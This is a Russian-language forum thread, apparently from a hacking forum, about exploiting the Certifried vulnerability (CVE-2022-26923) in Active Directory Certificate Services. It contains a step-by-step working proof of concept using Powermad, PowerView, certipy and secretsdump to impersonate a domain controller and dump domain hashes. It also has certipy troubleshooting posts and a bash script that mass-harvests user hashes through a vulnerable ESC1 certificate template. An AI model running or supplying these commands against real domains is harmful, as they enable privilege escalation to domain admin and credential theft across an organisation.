Remote Certifried: CVE-2022–26923 Abusing Active Directory Certificate Services

[IIIIXX]

Уязвимость в ADCS
https://nvd.nist.gov/vuln/detail/CVE-2022-26923
8.8/10

Гитхаб:

https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services
https://github.com/aniqfakhrul/certifried.py
https://github.com/ly4k/Certipy

Альтернативные методы, в некоторых используется устаревший синтаксис:

https://tryhackme.com/room/cve202226923
https://systemweakness.com/exploiting-cve-2022-26923-by-abusing-active-directory-certificate-services-adcs-a511023e5366
https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

 

[wav]

что то не то с аргументом,
certipy: error: unrecognized arguments: corp.local/john:Password@dc.corp.local

 

[IIIIXX]

что то не то с аргументом,
certipy: error: unrecognized arguments: corp.local/john:Password@dc.corp.local

В новой версии другие аргументы

certipy account create -username john@corp.local -p Password -target-ip 10.5.15.11 -dc-ip 10.5.15.11 -user johnpc -dns dc.corp.local

Или используй старую версию

https://github.com/ly4k/Certipy/releases/tag/2.0.9

 

[wav]

В новой версии другие аргументы

certipy account create -username john@corp.local -p Password -target-ip 10.5.15.11 -dc-ip 10.5.15.11 -user johnpc -dns dc.corp.local

Или используй старую версию

https://github.com/ly4k/Certipy/releases/tag/2.0.9

я не дурак, пробовал. там вообще аргумент create отсутсвует ))))
certipy: error: argument action: invalid choice: 'account' (choose from 'auth', 'ca', 'cert', 'find', 'forge', 'relay', 'req', 'shadow', 'template')
-------------------------------
Заюзав addcomputer.py успешно добавляет пк
[*] Successfully added machine account win7$ with password P@ssw0rd.
заюзав certipy
[-] Got error: socket ssl wrapping error: [WinError 10054]
Шняга какая то ))) Он походу для локального использования!

 

[IIIIXX]

Рабочий POC

###   Certifried: CVE-2022–26923

# run powershell with domain user token
runas /netonly /user:corp.local\john powershell.exe

# https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
Import-Module C:\programdata\Powermad.ps1
New-MachineAccount -MachineAccount johnpc -Domain corp.local -DomainController dc.corp.local
# password - Password123#

# https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module C:\programdata\PowerView.ps1
"johnpc" | Set-DomainObject -Clear ServicePrincipalName -Verbose

# update dns
"johnpc" | Set-DomainObject -Set @{'DnsHostName'='dc.corp.local'} -Verbose

# run new cmd
certipy req -username johnpc$@corp.local -password Password123# -target dc.corp.local -ca CORP-DC-CA -template Machine -dc-ip 192.168.10.10

# auth
certipy auth -pfx dc.pfx -dc-ip 192.168.10.10

# dump ntds
python3 secretsdump.py 'corp.local/DC$@dc.corp.local' -hashes :hashFromOutput

 

[Desconocido]

certipy: error: unrecognized arguments: -username users@domain.local -password pass -target dc.domain.local -ca subca01.domain.local\subca01 -template CA-NAME -dc-ip 192.168.1.1
из под пш или цмд не хочет работать, версия 4.0

 

[IIIIXX]

certipy: error: unrecognized arguments: -username users@domain.local -password pass -target dc.domain.local -ca subca01.domain.local\subca01 -template CA-NAME -dc-ip 192.168.1.1
из под пш или цмд не хочет работать, версия 4.0

Это поднималось уже много раз, без команды которую ты запускаешь и полного лога - тебе никто помочь не сможет
UPD: ну а вообще тут явно мимо -ca subca01.domain.local\subca01 попробуй указать имя центра сертификации

 

[Zalk]

В новой версии другие аргументы

certipy account create -username john@corp.local -p Password -target-ip 10.5.15.11 -dc-ip 10.5.15.11 -user johnpc -dns dc.corp.local

Или используй старую версию

https://github.com/ly4k/Certipy/releases/tag/2.0.9

в чем смысл пробития не пойму? вводить пароль и логил что бы что? Если есть логин пароль это не значит что ты уже пробил? че за бред не понимаю!!!!!

 

[IIIIXX]

в чем смысл пробития не пойму? вводить пароль и логил что бы что? Если есть логин пароль это не значит что ты уже пробил? че за бред не понимаю!!!!!

Если у тебя уже есть логин:пароль доменного администратора, тогда не нужно.

 

[C0rtex]

xD

 

[DarckSol]

 

[Sec13B]

ESC1 secrets dump

#!/bin/bash

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 <username.txt>" >&2
  exit 1
fi

input_file="$1"

hashes_file="hashes.txt"

while read -r line; do
    certipy req -u 'user@victim.local' -p 'password123' -target 'DC' -ca 'CA-Vuln' -template 'Vulnerable Template' -upn "$line"
    certipy auth -pfx "$line.pfx" -dc-ip '192.168.1.7' -username "$line" -domain 'victim.local'  | tee /dev/tty | grep "Got hash for" >> "$hashes_file"
    rm -rf *.pfx
    rm -rf *.ccache
done < "$input_file"

printf "[+] Done dumping!"